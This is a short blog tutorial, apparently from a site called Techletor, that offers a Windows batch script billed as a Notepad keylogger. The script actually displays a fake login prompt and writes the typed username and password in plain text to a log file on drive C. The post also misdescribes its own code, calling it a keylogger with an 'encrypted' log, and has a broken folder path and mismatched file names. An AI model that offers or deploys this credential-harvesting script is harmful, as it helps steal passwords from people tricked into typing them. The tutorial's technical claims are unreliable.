Techletor: How To Create Keylogger Using Notepad

Wednesday, February 7, 2024

How To Create Keylogger Using Notepad


This method makes it very simple to record keystrokes on a PC without the need for additional software. A keylogger is a kind of spy software that can capture all of your keystrokes and save them to an encrypted log file. Since they may follow your activities, record your keystrokes, and record the websites you visit, all keyloggers are harmful. This makes it simple for hackers to break into your account.

The passwords to your financial accounts can also be found by these keyloggers. The Notepad text editor can also be used to develop these kinds of keyloggers. Now let's see how to use Notepad to create a keylogger.


Also Read: How To Create Computer Virus in Less Than 60 Seconds


How To Create Keylogger Using Notepad

This is a really basic procedure that only requires a notepad to complete; no special instrument is needed. To continue, simply click the post below.


See Also: The Best 10 Methods For Keeping Windows Virus-Free


1. To begin with, you must first click the Window button and choose Notepad from the list of alternatives to launch Notepad in Windows. Copy and paste the code below it into Notepad now.


@echo off

 color a

 title Login

 cls

 echo Please Enter Your Email Address And Password

 echo.

 echo.

 cd "C:Logs"

 set /p user=Username:

 set /p pass=Password:

 echo Username="%user%" Password="%pass%" >> Log.txt

 start >>Program Here<<

 exit


2. Save this file to your desktop as Logs.bat at this point.

3. At this point, make a new logs folder. The keylogger will only function if the folder name is logged, so keep that in mind. Paste the folder onto drive C after cutting it.

4. After entering your username and password, test your file Log.bat.

5. When you open the C drive folder, all of the recorded key logs are visible there as an automatically formed text file.

And that's it! You've completed the process of creating a keylogger in Notepad.


Also Read: How to Remove Virus from Computer without any Antivirus


With this method, you can easily record the keystrokes of your keyboard that had been entered in the batch file.

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home